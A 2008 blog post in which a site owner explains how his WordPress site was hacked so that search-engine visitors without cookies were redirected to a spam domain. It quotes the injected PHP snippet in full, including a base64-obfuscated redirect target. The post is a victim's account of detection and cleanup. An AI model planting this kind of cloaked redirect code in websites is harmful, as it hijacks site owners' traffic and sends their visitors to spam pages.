WordPress Hacked, Search Engine Traffic Stolen by AnyResults.net

by Michael on June 5, 2008 · 5 comments

Something scary happened today at one of my other sites. Around 3:30 EDT, I noticed that I was getting many fewer visitors than normal. Upon further investigation, I realized that my search engine traffic had all but dried up. Thinking I had been banned by Google, I dug deeper.

Oddly enough, I still ranked well for all of the terms that had brought me traffic in the past. So what was happening? If I was still ranking well in the SERPs, why weren’t people clicking through?

Unsure of what else to do, I enlisted the help of some friends. Among other things, I asked these guys to search for a few keywords to see if my rankings were holding up. As it turns out, my search results were just fine, ruling out the possibility that Google had rolled out new search data that simply hadn’t filtered down to our neck of the woods.

And then it happened…

One of my friends clicked on a Google search result and was redirected elsewhere. But when he clicked it again, all was well. When I reported this to another friend, he saw something similar.

As it turns out, I was the victim of a WordPress hack that stole pretty much all of my search traffic, but somehow hid itself using cookies. Upon further inspection, I discovered the following bit of code at the top of index.php:

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

If you hit Google without the cookie and tried to click through to my site, you were directed elsewhere. But once it happened to you once, it couldn’t be repeated until you cleared your cookies. Very sneaky.

So where was all of my traffic going?

It was being shunted through www.anyresult.net (no link for you!) and then winding up at a spammy, ad-filled landing page on www.dealtime.com (again, no link for you — I’ve helped enough today). I suspect that dealtime.com had likewise been compromised, though I can’t say for sure.

I’m still not sure how they got in, but I’ve reported it to my host, cleaned everything up, and changed all of my passwords. For reference, I was running WordPress 2.3.3, though I have since upgraded to WordPress 2.5.1.

Before you ask, yes, I’m aware that I was taking a slight risk by running a slightly older version of WordPress. In my defense, however, early releases of major WordPress updates often have numerous bugs of their own. As such, I typically wait until at X.X.2 before upgrading unless a serious hole is discovered in the version that I’m currently using.

Guess what? I just found one.

{ 5 comments… read them below or add one }